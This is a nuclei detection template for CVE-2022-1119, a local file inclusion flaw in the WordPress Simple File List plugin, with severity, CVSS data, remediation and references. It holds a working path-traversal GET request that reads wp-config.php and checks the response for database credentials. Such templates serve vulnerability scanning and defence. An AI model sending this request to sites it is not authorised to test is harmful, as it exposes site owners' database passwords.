nuclei-templates/http/cves/2022/CVE-2022-1119.yaml

51 lines
1.9 KiB
YAML

id: CVE-2022-1119
info:
name: WordPress Simple File List <3.2.8 - Local File Inclusion
author: random-robbie
severity: high
description: |
WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
remediation: |
Update WordPress Simple File List to version 3.2.8 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
- https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
- https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
- https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1119
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1119
cwe-id: CWE-22
epss-score: 0.40794
epss-percentile: 0.96876
cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: simplefilelist
product: simple-file-list
framework: wordpress
tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220452956f3f89f5fe3e960fb9861408b4bf5eb806fcd004c252cbb767b2a56c9d4022100dfe0716a3ca27cb3c23daa27a19cab28d1facf1bfc1806359e2db06acff9bd42:922c64590222798bb761d5b6d8e72950